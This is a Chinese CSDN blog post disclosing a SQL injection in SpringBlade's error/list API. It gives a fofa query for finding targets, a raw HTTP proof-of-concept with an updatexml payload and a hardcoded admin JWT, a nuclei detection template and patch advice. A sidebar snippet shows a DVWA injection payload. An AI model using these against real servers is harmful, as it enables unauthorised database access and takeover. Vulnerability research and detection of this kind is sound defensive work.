【无标题】SpringBlade error/list SQL 注入漏洞

已于 2024-06-19 15:57:13 修改
阅读量296 收藏 4
点赞数 5
文章标签: sql 数据库 漏洞挖掘
于 2024-06-19 15:47:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80127209/article/details/139805389
版权

漏洞描述

SpringBlade 是一个由商业级项目升级优化而来的 SpringCloud 分布式微服务架构、SpringBoot 单体式微服务架构并存的综合型项目。SpringBlade框架后台/api/blade-log/error/list路径存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

产品界面

fofa语法

body="https://bladex.vip"

POC

 

  1. GET /api/blade-log/error/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
  2. Host: 
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
  4. Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ
  5. Accept-Encoding: gzip, deflate
  6. Accept-Language: zh-CN,zh;q=0.9
  7. Connection: close
 

 

 

nuclei验证
 

 

  1. id: SpringBlade-error-list-SQL
  3. info:
  4. name: SpringBlade error/list SQL 注入漏洞
  5. author: nobody
  6. severity: high
  7. description: |
  8. SpringBlade 框架后台 /api/blade-log/error/list路径存在SQL注入漏洞,攻击者可以利用 SQL 注入漏洞获取数据库中的信息(管理员后台密码、站点的用户个人信息),还可以在
  9. 拥有高权限的情况下向服务器写入木马文件,造成服务器失陷。
  10. impact: |
  11. 攻击者可以利用 SQL 注入漏洞获取数据库中的信息
  12. remediation: |
  13. 升级版本,打补丁
  14. metadata:
  15. verified: true
  16. max-request: 3
  17. fofa-query: body="https://bladex.vip"
  18. tags: 
  20. requests:
  21. - raw:
  22. - |
  23. GET /api/blade-log/error/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
  24. Host: {{Hostname}}
  25. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
  26. Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ
  27. Accept-Encoding: gzip, deflate
  28. Accept-Language: zh-CN,zh;q=0.9
  29. Connection: close
  31. matchers:
  32. - type: dsl
  33. dsl:
  34. - status_code==500 && contains_all(body,"XPATH syntax error","Error querying database")
 

 

 

修复建议
 

  • 建议升级到最新版本或打补丁
  • 非必要禁止公网访问或白名单访问
  •  
     申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。
     

                

        

        

    




    

      

        

            

              
                
                  运维Z叔
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    5
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    4
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
SQL Server 2008 R2:error 26 开启远程连接详解

				
			

			

				

					01-01
				

			

		

		

			
				
 (provider: SQL Network Interfaces, error: 26 – 定位指定的服务器/实例时出错)–>  因为sql server 2008默认是不允许远程连接的,sa帐户也是默认禁用的,如果想要在本地用SSMS(SQL Server Management St

			
		

	



                

              
                



	

		

			

				
					
asp 防止SQL注入代码

				
			

			

				

					01-20
				

			

		

		

			
				
把下面代码复制到每个文件头部就可以防止SQL注入了,写程序安全最重要 :) <% Dim Fy_Url,Fy_a,Fy_x,Fy_Cs(),Fy_Cl,Fy_Ts,Fy_Zx ‘—定义部份 头—— Fy_Cl = 1 ‘处理方式:1=提示信息,2=转向页面,3=...

			
		

	



                


  
              

                


	

		

			

				
					
sql server中错误日志errorlog的深入讲解

				
			

			

				

					12-16
				

			

		

		

			
				
SQL Server 将某些系统事件和用户定义事件记录到 SQL Server 错误日志和 Microsoft Windows 应用程序日志中。 这两种日志都会自动给所有记录事件加上时间戳。 使用 SQL Server 错误日志中的信息可以解决SQL Server的...

			
		

	





	

		

			

				
					
Oracle PL/SQL中异常高级特性示例解析

				
			

			

				

					09-09
				

			

		

		

			
				
在Oracle的PL/SQL编程中,异常处理是一个关键特性,它允许开发者优雅地处理程序运行时可能出现的问题。本文将深入探讨PL/SQL的三种高级异常处理特性,旨在弥补Oracle内置异常的不足,以满足实际开发中的复杂需求。  ...

			
		

	



		

			
		



	

		

			

				
					
Oracle教程之pl/sql简介

				
			

			

				

					09-10
				

			

		

		

			
				
Oracle PL/SQL是一种在Oracle数据库环境中使用的编程语言,它是SQL的增强版本,融合了过程化编程元素。PL/SQL提供了一种结构化的编程环境,允许开发者编写复杂的数据库应用程序,包括存储过程、函数和触发器等。  一...

			
		

	





	

		

			

				
					
SQLAlchemy 连接池

				
			

			

				

					youhebuke225的博客
				

				

					06-17
					
					249
					
				

			

		

		

			
				
调整这些参数可以帮助你更好地管理数据库连接,并减少因连接超时或服务器断开连接而导致的问题。记得根据你的应用程序的需求和数据库服务器的配置来合理设置这些参数。在 SQLAlchemy 中,确实可以通过配置连接池的参数来管理连接的超时和回收,从而确保连接在需要时能够被重新建立。SQLAlchemy 使用的是。作为其默认的连接池实现。为了配置这些参数,你可以在创建引擎时将它们传递给。

			
		

	





	

		

			

				
					
【AI+编程】工作日常场景随时可以AI编程,记一个问答SQL快速导出数据日常示例

				
			

			

				

					月晓风清
				

				

					06-15
					
					481
					
				

			

		

		

			
				
为了实现你需要的操作,即以问题名称作为表头,答案作为内容导出,你可以通过JOIN操作连接三个表,然后利用动态SQL语句进行行转列转换(PIVOT)。然后通过执行这个动态生成的SQL,你可以得到一个表格,表中的每一行表示一个成员,对应每个问题的答案作为列数据。然后,在动态生成的SQL语句中利用JOIN把db_member、db_question和db_answer连接起来,并根据question_id和member_id进行匹配,以输出每个成员对应的问题答案。下面是假定表结构,实际场景和它类似。

			
		

	





	

		

			

				
					
PostgreSQL源码分析——CREATE DATABASE

				
			

			

				

					让我思考一下
				

				

					06-18
					
					598
					
				

			

		

		

			
				
这里我们分析一下在PostgreSQL中创建数据库的源码,在分析源码之前,最好先阅读《PostgreSQL指南内幕探索》的第一章,数据库集簇、数据库和数据表,弄清其空间布局,理解PG中,数据库、表、元组是怎么布局的。通俗一点说,创建一个数据库相当于创建一个数据目录,在这个目录下,存放该数据库中定义的表、索引等对象。

			
		

	





	

		

			

				
					
PostgreSQL源码分析——INSERT

				
			

			

				

					让我思考一下
				

				

					06-18
					
					317
					
				

			

		

		

			
				
这里我们对INSERT语句进行分析, 只分析其宏观过程,具体细节后续再分析。我们就分析下面的语句的执行过程。

			
		

	





	

		

			

				
					
57.SAP MII产品介绍(07)功能详解(06)Workbench-SQLQuery

				
			

			

				

					智盟科技智能制造团队的博客
				

				

					06-19
					
					326
					
				

			

		

		

			
				
您可以使用SAP Manufacturing Integration and Intelligence(SAP MII)Workbench中的SQLQuery来创建访问面向SQL的连接器(如IDBC连接器)的模板。此查询的扩展名为tqsq。

			
		

	





	

		

			

				
					
PostgreSQL源码分析 —— 除法运算符

				
			

			

				

					让我思考一下
				

				

					06-18
					
					366
					
				

			

		

		

			
				
我们分析一下在PostgreSQL数据库中,是如何实现除法操作的。其他的运算符操作与之类似。

			
		

	





	

		

			

				
					
PostgreSQL源码分析——CREATE TYPE

				
			

			

				

					让我思考一下
				

				

					06-18
					
					367
					
				

			

		

		

			
				
定义一个复合类型某种程度上就是定义一张新的表,表的rowtype就是复合类型。会看到创建一个复合类型的同时会创建一个同名的表。这个表可以在pg_class系统表中查到,但是通过\d等却查不到,也不能想表中插入数据,因为它并不是真正意义上的表,只是用表实现复合类型。这部分因为不是可优化语句,没有什么处理。这部分因为是Utility语句,没有什么处理的。创建复合类型,我们分析一下其源码实现。

			
		

	





	

		

			

				
					
NL2SQL技术方案系列(1):NL2API、NL2SQL技术路径选择;LLM选型与Prompt工程技巧,揭秘项目落地优化之道

				
			

			

				

					2401_85325726的博客
				

				

					06-15
					
					747
					
				

			

		

		

			
				
NL2SQL任务的目标是将用户对某个数据库的自然语言问题转化为相应的SQL查询。随着LLM的发展,使用LLM进行NL2SQL已成为一种新的范式。在这一过程中,如何利用提示工程来发掘LLM的NL2SQL能力显得尤为重要。数据结构****复杂:企业信息系统的数据结构复杂性远远超过几个简单的 Excel 文件,一个大型企业应用可能存在几百上千个数据实体,所以在实际应用中,大型 BI 系统会在前端经过汇聚、简化与抽象成新的语义层,方便理解。数据量较大。

			
		

	





	

		

			

				
					
非关系型数据库NoSQL数据层解决方案 之 redis springboot整合与读写操作 2024详解以及window版redis5.0.14下载百度网盘

				
			

			

				

					牛马程序员的博客
				

				

					06-15
					
					1124
					
				

			

		

		

			
				
Spring Framework 提供的用于操作 Redis 数据库的核心类之一。它是 Spring Data Redis 模块的一部分,通过提供高级的、线程安全的访问 Redis 数据库的方法,简化了与 Redis 的集成和操作。在把数据写入数据库的时候 已经把对象类型的数据进行了转码。我们写在数据库里面的是以字符串为数据类型的存储单元。和我们之前安装的redis不是一个redis。即在springboot里整合的redis。我们发现在idea里使用的redis。这样我们就能放入我们之前存入的数据。

			
		

	





	

		

			

				
					
PostgreSQL源码分析——CREATE CAST

				
			

			

				

					让我思考一下
				

				

					06-18
					
					344
					
				

			

		

		

			
				
语句自定义一个类型转换,数据库肯定有个地方将这个转换的信息存起来,这个地方就是pg_cast系统表。pg_cast系统表存在数据类型转换路径,包括内建和用户自定义的。函数的主要内容就是将用户自定义的类型转换信息插入到pg_cast系统表中。下面我们主要分析一下其源码,看一下是如何实现的。我们首先分析一下其语法解析部分,这部分比较简单,核心是。如何使用以及用法请参考PostgreSQL文档中。后续会重点分析一下这个函数。—— 定义一个用户自定义的类型转换。非常容易理解,下面我们重点分析一下。

			
		

	





	

		

			

				
					
PostgreSQL源码分析——视图查询重写

				
			

			

				

					让我思考一下
				

				

					06-18
					
					534
					
				

			

		

		

			
				
这里我们分析一下查询重写的过程,主要分析视图的查询重写的过程。

			
		

	





	

		

			

				
					
PostgreSQL源码分析 —— CAST类型转换

				
			

			

				

					让我思考一下
				

				

					06-18
					
					485
					
				

			

		

		

			
				
我们分析一下PostgreSQL中显式类型转换是如何实现的,在PostgreSQL中,显式类型转换可以用等同于。这里我们以为例进行分析。再结合之前对的分析,基本就弄清了一部分PostgreSQL中数据类型转换问题。当然要完整的理解类型转换还需要完整的理解PostgreSQL中的类型系统,后续还需要我们逐步的深入理解。

			
		

	





	

		

			

				
					
mybatis查询PostgreSQL报错:无法确定参数 $1 的数据类型

					
最新发布

				
			

			

				

					程序人生
				

				

					06-21
					
					91
					
				

			

		

		

			
				
Cause: org.postgresql.util.PSQLException: 错误: 无法确定参数 $1 的数据类型
; bad SQL grammar []; nested exception is org.postgresql.util.PSQLException: 错误: 无法确定参数 $1 的数据类型] with root cause
org.postgresql.util.PSQLException: 错误: 无法确定参数 $1 的数据类型

			
		

	





	

		

			

				
					
在同一个 Blazor 应用中结合 SQL-DB 和 MongoDB

				
			

			

				

					技术探索驿站
				

				

					06-19
					
					1172
					
				

			

		

		

			
				
传统上,在单应用程序中,我们对整个应用程序使用单个数据库服务器。但是,我将 SQL 数据库和 MongoDB 结合在同一个应用程序中。此应用程序将是 RDBMS 和 No SQL 数据库的组合。我们将从头开始创建一个 Blazor 应用程序,并使用数据迁移创建一个 SQL 数据库和一个表。我们将使用此 SQL DB 来保存员工数据。我们将使用 MongoDB 数据库来保存城市数据。我们可以一步一步地看到所有操作。

			
		

	





	

		

			

				
					
编写一个能够验证dvwasql注入漏洞的poc

				
			

			

				

					07-13
				

			

		

		

			
				
我可以帮你提供一个简单的示例代码来验证 DVWA(Damn Vulnerable Web Application)中的 SQL 注入漏洞。请注意,这个示例仅用于教育目的,不要在未经授权的情况下使用它。

```
import requests

def check_sql_injection_vulnerability(url):
    payload = "' OR '1'='1' -- "
    response = requests.get(url + "?id=" + payload)
    
    if "Error" in response.text:
        print("该网站存在 SQL 注入漏洞!")
    else:
        print("该网站不存在 SQL 注入漏洞。")

# 在这里替换为你的 DVWA 网站的 URL
dvwa_url = "http://example.com/dvwa/vulnerabilities/sqli/"

check_sql_injection_vulnerability(dvwa_url)
```

请确保替换 `dvwa_url` 变量为你自己的 DVWA 网站的 URL,然后运行代码。如果输出显示该网站存在 SQL 注入漏洞,则说明你的 DVWA 配置存在问题,需要进行修复。

请记住,这只是一个简单的示例,实际的 SQL 注入漏洞检测可能需要更复杂的测试方法和技术。在进行任何安全测试之前,请确保遵守法律和道德准则,并获得适当的授权。

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值